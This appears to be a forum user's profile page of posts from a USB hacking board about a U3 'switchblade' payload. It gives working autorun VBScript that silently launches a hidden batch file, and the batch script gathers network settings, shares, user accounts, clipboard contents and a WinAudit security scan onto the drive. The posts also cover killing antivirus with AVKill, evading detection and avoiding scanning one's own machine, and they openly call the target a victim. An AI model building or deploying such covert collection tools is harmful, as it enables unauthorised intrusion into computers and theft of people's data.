beakmyn
-
Posts
422 -
Joined
-
Last visited
Posts posted by beakmyn
-
-
So, I'm in process of re-writing the switchblade 'code' into vbs. It's based on GonZor's method so it uses the ###.dat files
This is so that I can output the data into HTML format (very similar to WinAudit html)
Now here comes one question/decision. Since vbs is more powerful then a simple batch file I can either
A. wshell.exec ("net user") which will be very fast and give me a list of users
B. Use WMI or another technique and get vastly more data
AccountType Caption Description Disabled Domain FullName LocalAccount Lockout Name PasswordChangeable PasswordExpires PasswordRequired SID SIDType Status
After doing some testing it appears that as expected wshell.exec is almost instantaneous whereas WMI or another method takes 20 seconds.
Which would you prefer? I suppose I could just code both and then the user could just put a 1 or 2 in the dat file and I'll run the appropriate one.
-
Seeing as batch files are wonderful things in of themselves, this 2007 and I want my eyecandy output. So, with or without the community's permission I'm re-writing the switchblade batch file in vbs. Why because vbs is much more powerful then batch files and also gives me the ability to easily manipulate text files and munge them into the html I'm looking for.
-
Oh I thought you were working on something more complicated. I'm in the process of formatting the output using the WinAudit HTML output style with tables and anchors, etc.
-
I'd like to see that HTML output. I'm working on that now myself.
-
http://www.frontiernet.net/~wardriver/U3CUSTOM.zip
That's got just the scripts and .dat files needed
Items in the FD folder need to go on the flash partition sans the FD folder
-
I made some updates to your scripts, nice job btw.
go.vbs renamed to -> autorun.vbs just because. I still got the occasional insert disk error so I've added to skip a: b: and error handling that just keeps chugging if it hits a problem, better then crashing and posting a dialog to the
uservictim.I've included only what's different otherwise I'm over the max characters for message:
Set objFSO = CreateObject("Scripting.FileSystemObject") Set objShell = CreateObject("Wscript.Shell") Set colDrives = objFSO.Drives On Error Resume Next strDate = Year(now()) & Right("0" & Month(now()), 2) & Right("0" & Day(now()), 2) strTime = Right("0" & Hour(now()), 2) & Right("0" & Minute(now()), 2) & Right("0" & Second(now()), 2) For Each objDrive in colDrives 'ignore floppy drives - reserved by BIOS if they don't exist If UCase(objDrive.DriveLetter) <> "A" And UCase(objDrive.DriveLetter) <> "B" Then If objFSO.FileExists(objDrive.DriveLetter & ":SystemSRCdrv.dat") Then strfd = objDrive.Driveletter & ":" End If If objFSO.FileExists(objDrive.DriveLetter & ":SystemSRCgo.bat") Then strU3 = objDrive.Driveletter & ":" End If End if Next If objFSO.FileExists(strfd & "SystemSRCPL.dat") Then objShell.Run strU3 & "SystemSRCgo.bat " & strfd & "," & strU3 & "," & strDate & "," & strTime, 0, False End If If objFSO.FileExists(strfd & "SystemSRCU3.dat") Then objShell.Run ".LaunchU3.exe -a" End If
go.bat
I've added nircmd to grab the clipboard contents and winaudit (google it)
:: Props: Setzer1411, Marc, rpk5000 :: fd = flash partition (writable) :: U3 = cdrom partition (readonly) @ECHO off If %computername%.==. SET computername=computer If %username%.==. SET username=None SET fd=%1System SET U3=%2SystemSRC CD %U3% >NUL :: SET LOG PATHS IF NOT EXIST %fd%Logs%computername% ( MD %fd%Logs%computername% ) SET logdir=%fd%Logs%computername% SET log="%fd%Logs%computername%%computername%-[%3-%4].log" SET tmplog="%fd%Logs%computername%%computername%_TEMP.log" SET include="%fd%SRCInclude SET /p eipurl=<"%1SystemSRCIncludeEIP.dat" SET /p winaud=<"%1SystemSRCIncludewinaud.dat" :: PAYLOAD ECHO ----------------------------------------------------------------------------------------------------------------------------- > %log% 2>&1 ECHO GonZors mod by Beakmyn Payload [Time Started: %date% %time%] >> %log% 2>&1 ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO Computer Name is: %computername% and the Logged on User Is: %username% >> %log% 2>&1 IF EXIST %include%0.dat" ( ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [System info] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 IPCONFIG /all >> %log% 2>&1 Echo +-----------------------------------+ >> %log% 2>&1 Echo + Shares + >> %log% 2>&1 Echo +-----------------------------------+ >> %log% 2>&1 net share >> %log% 2>&1 Echo +-----------------------------------+ >> %log% 2>&1 Echo + Users + >> %log% 2>&1 Echo +-----------------------------------+ >> %log% 2>&1 net user >> %log% 2>&1 ) IF EXIST %include%19.dat" ( ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 Echo +-----------------------------------+ >> %log% 2>&1 Echo + Clipboard + >> %log% 2>&1 Echo +-----------------------------------+ >> %log% 2>&1 .nircmd.exe clipboard addfile %log% ) IF EXIST %include%20.dat" ( ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 Echo +-----------------------------------+ >> %log% 2>&1 Echo + Win Audit + >> %log% 2>&1 Echo +-----------------------------------+ >> %log% 2>&1 ECHO WinAudit saved to %logdir% >> %log% 2>&1 .WinAudit.exe %winaud% /f=%logdir%WA_%computername%[%3-%4] /f=%logdir%WA_%computername%[%3-%4].txt >> %log% 2>&1 ECHO. >> %log% 2>&1 ) ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO GonZors mod by Beakmyn Payload [Time Finished: %date% %time%] >> %log% 2>&1 ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 :End EXIT
winaud.dat rtfm for winaudit to see what the switches do
/r=oxutn /o=PDF /m=CA Security Scan
Also for the EIP I use
You could use regular expressions to remove the extra HTML
<html><head><title>Current IP Check</title></head><body>Current IP Address:127.0.0.1</body></html>
but it gets the job done and uses a public server
Take a look at nircmd if you haven't already it does a lot of nice things with the registry and such. Could automate things more smoothly. It'll also allow you to beep the speaker at frequency and length. 3 quick 2600hz tones at the end of the script could tell you when to pull out. ;)
-
Found the following issues
| was being used as a piped command where I think your intention was for it to be a pipe character.
If you have a multi-card usb hub or other usb holder with no disk, the for loop will cause errors to be displayed to the user about "no disk present" abort,retry,fail
Count script sometimes returns "volume in drive d is removable" (where d is variable) this screws up the file name and you get
computername - [volume in drive d is removable].log
I'm investigating root cause.
-
In certain situations you'll notice I do use " in pairs, and ultimately they end up being used in pairs anyway. Generally If I am setting a folder path I will use a single " at the beginning but if I am setting a path to a file I will enclose it in " marks (I know that makes no sense but you will have to forgive me I have had no sleep)
SET include="G:SRCInclude IF EXIST %include%0.dat"
When the second line is expanded it will look like this
"G:SRCInclude0.dat"
Note the " on either end, If I were to enclose each in " like so
SET include="G:SRCInclude" IF EXIST "%include%0.dat"
When the second line is expanded it will look like this, and fail
""G:SRCInclude"0.dat"
To simplify my code I could get away without using any " for this situation but it is just a habit I have picked up.
Sorry about the rough quick explanation, If it doesn't make sense I can attempt another explanation after I've had some sleep.
I'm doing some tweaks to it now and compiling the batch files to executables, etc.
Id love to take a look at the tweaks you've made, as well as the executable. What language?
It makes perfect sense. I just didn't realize that you could do that. I'm used to " denoting a string data type and that it has to have a closing ". Or in some case 3 " which what I expected to see in your code. But that tends to muck things up so instead I'll use chr(34) or equivalent and concatenation.
I guess the batch file environment is more forgiving being an interpretated language but it makes the syntax highlighting in ExeScript goofing.
That's what I'm using to compile the batches (ExeScript). Albeit it's still just a batch file with a exe wrapper. Not a real executable, yet.
One thing I've done is changed the layout for the log file:
ECHO +-----------------------------------+ >> %log% 2>&1 ECHO | [System info] | >> %log% 2>&1 ECHO +-----------------------------------+ >> %log% 2>&1
I find the above easier on the eyes then the old ***** method
I'm also going to add in a safety file, time-date stamp, grab clipboard contents and other minor tweaks. I'll post when its done.
The one thing I do like is that you still have launchpad functionality and the tools are on the CDROM partition rather then flash. I'm also going to verify fgdump as I've never gotten that to work and used an older pwdump instead.
-
Nice job! I'm doing some tweaks to it now and compiling the batch files to executables, etc. But one thing struck me as odd and most likely it's my relatively vacant use of batch files. You seem to use the " mark singularly.
such as:
SET U3="%%i:SRC
or
IF EXIST %include%1. dat" (
What is the reason for this? typically I've seen the use of the as an escape character and I'm used to seeing the " being used in pairs to enclose items with spaces or use literal meaning.
Just curious.
~Gozor~ Finished Payload
in USB Hacks
Posted
I'll post once it's finished and tested. Gonzor I'll PM you when I have something to test. I'm looking into alternatives to using 3rd party programs. Not that I have anything against Nir's tools but if it's something I can do using Native Windows tools then the AV/OS is none the wiser.
@HarshReality
The AV is typically killed using AVKill but some Antivirus are immune or will countermeasure
Safety.txt is one of a couple schemes to keep from scanning yourself. I've typically seen it used in the autorun script not the switchblade script.
The 2 ways I know to keep from scanning yourself:
1. checks for presence of file "X"
2. checks computername/user against list stored in file on U3
Personally I would go with 1, less of paper trail, lest you lose your switchblade, but requires access to machine prior to using. This is of course not necessary if you remember to hold down the shift key when inserting U3 drive.